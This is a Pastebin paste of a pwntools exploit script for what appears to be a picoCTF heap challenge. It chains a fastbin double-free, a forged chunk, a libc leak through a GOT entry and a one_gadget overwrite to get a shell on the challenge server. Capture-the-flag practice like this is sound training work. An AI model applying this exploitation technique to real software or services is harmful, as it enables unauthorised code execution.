API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 24th, 2019
88
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.59 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/python2
  2. from pwn import *
  3. import re
  4.  
  5. context.terminal = ["termite", "-e"]
  6. cidx = 0
  7.  
  8. def alloc(p, name, price):
  9. p.sendline("M")
  10. p.sendlineafter("Name>", name)
  11. p.sendlineafter("Price>", str(price))
  12. global cidx
  13. cidx = cidx + 1
  14. return cidx - 1
  15.  
  16. def free(p, i):
  17. p.sendline("S")
  18. p.sendlineafter("This customer looks really hungry. Which cake would you like to give them?", str(i))
  19. p.recvuntil("The customer looks really happy with !")
  20.  
  21. def leak(p, i):
  22. p.clean()
  23. p.sendline("I")
  24. p.sendlineafter("Which one?", str(i))
  25. leak = p.recvline_contains("is being sold for")
  26. leak = leak.split('$')[-1]
  27. return int(leak)
  28.  
  29. def break_heap():
  30. global cidx
  31. p = remote('2018shell2.picoctf.com', 42542)
  32. '''
  33. set customers to 0x21 so we can control more of the array,
  34. and so that it is a valid chunk
  35. '''
  36. shop = 0x6030e0 #address of shop struct
  37. p_plt = 0x603048 # &printf.got
  38. p_off = 0x55800 # offset from libc base to printf
  39. one_gadget = 0x45216 # magic one gadget
  40.  
  41. A = alloc(p, "", 16)
  42. B = alloc(p, "", 17)
  43. free(p, A) # A->bk NULL, A = fastbin freelist top
  44. free(p, B) # B->bk = A, B = fastbin freelist top
  45. free(p, A) # A->bk = B, A = fastbin freelist top
  46. # overwrite A->bk with fake chunk before shop. (set shop->price and fchunk size)
  47. C = alloc(p, "", int(shop-0x8))
  48.  
  49. D = alloc(p, "", 0) # next malloc returns B
  50. E = alloc(p, "", 0) # this alloc returns A
  51. # Next alloc returns shop+0x8. Overwrite customers with shop-0x8 and counter[0] with got addr
  52. F = alloc(p, struct.pack("L", p_plt), int(shop-0x8))
  53.  
  54. # Libc leak from dereferencing overwritten counter[0]
  55. libc = leak(p, 0) - p_off
  56. log.info('libc base is at: ' + hex(libc))
  57. # Next step is redoing step 1) except now the forged chunk->next will point to shop-0x8
  58. # Then we will NULL out counter[0]
  59. # The following address will be shop-0x8 which means counter[0]->name will overwrite counter[0]
  60. # And we can get an arbitrary write primitive
  61.  
  62. #you know the drill
  63. free(p, D) # D->bk NULL, D fastbin freelist head
  64. free(p, E) # E->bk NULL, E fastbin freelist head
  65. free(p, D) # D->bk = E, D fastbin freelist head
  66. # overwrite D->bk with fake chunk before shop
  67. G = alloc(p, "", int(shop-0x8))
  68.  
  69. H = alloc(p, "", 0) # this malloc returns E
  70. I = alloc(p, "", 0) # this malloc returns D
  71. J = alloc(p, struct.pack("L", 0), 0) # this malloc returns shop+0x8
  72. K = alloc(p, struct.pack("L", p_plt), libc + one_gadget)
  73.  
  74. p.interactive()
  75.  
  76. break_heap()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!